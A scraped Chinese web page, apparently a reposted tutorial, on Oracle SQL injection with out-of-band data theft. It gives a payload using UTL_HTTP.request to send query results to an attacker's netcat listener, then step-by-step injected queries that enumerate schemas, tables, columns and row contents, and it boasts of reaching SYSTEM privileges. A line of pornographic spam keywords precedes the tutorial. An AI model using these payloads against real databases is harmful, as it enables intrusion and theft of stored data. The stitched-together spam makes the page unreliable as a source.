日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
Oracle注射技術(shù)——Oracle+nc注射

首先外網(wǎng)nc監(jiān)聽對(duì)應(yīng)的端口

and UTL_HTTP.request('外網(wǎng)ip:port/'||(sql語句))=1--

爆庫:

select owner from all_tables where rownum=1
select owner from all_tables where owner<>'第一個(gè)庫名' 
and rownum=1
select owner from all_tables where owner<>'第一個(gè)庫名' 
and owner<>'第二個(gè)'and rownum=1
select owner from all_tables where owner<>'第一個(gè)庫名' 
and owner<>'第一個(gè)庫名' and rownum=1

以此論推

爆表

select TABLE_NAME from all_tables where owner='庫名'
and rownum=1
select TABLE_NAME from all_tables where owner='庫名'
and rownum=1 and TABLE_NAME<>'表名1'
select TABLE_NAME from all_tables where owner='庫名'and rownum=1 
and TABLE_NAME<>'表名1' and TABLE_NAME<>'表名2'

以此論推

爆列:

select COLUMN_NAME from user_tab_columns where table_name='表名' 
and rownum=1
select COLUMN_NAME from user_tab_columns where table_name='表名' 
and rownum=1 and COLUMN_NAME<>'第一個(gè)爆出的列名'
select COLUMN_NAME from user_tab_columns where table_name='表名' 
and rownum=1 and COLUMN_NAME<>'第一個(gè)爆出的列名' and COLUMN_NAME<>'第二個(gè)爆出的列名'

爆內(nèi)容:

第一個(gè)內(nèi)容:select 列名 from 表名 where rownum=1

第二個(gè)內(nèi)容:select 列名 from 表名 where rownum=1 and 列名<>'第一個(gè)值'

第三個(gè)內(nèi)容:select 列名 from 表名 where rownum=1 and 列名<>'第一個(gè)值' and 列名<>'第二個(gè)值'

以此論推

現(xiàn)在大家轉(zhuǎn)過頭來看下“萬網(wǎng)的尷尬-萬網(wǎng)ORACLE注入漏洞曝光http://bbs.exploits.com.cn/read.php?tid-144.html

是不是很明了了...o(∩_∩)o...哈哈

注:

1:在windows環(huán)境下,oracle是以服務(wù)的形式啟動(dòng)的,這樣通過web注射就可以直接獲得system權(quán)限(此部分內(nèi)容正在整理測(cè)試階段中,以供給大家更直觀、簡(jiǎn)潔、有效的參考資料

2:針對(duì)unix和linux操作系統(tǒng)方面對(duì)于Oracle也會(huì)作出分析,相信Oracle注射將會(huì)成為轉(zhuǎn)入高級(jí)Hack入侵的橋梁

3.這是個(gè)系列文章,后文有待更新


本文題目:Oracle注射技術(shù)——Oracle+nc注射
轉(zhuǎn)載注明:http://m.5511xx.com/article/djddgpg.html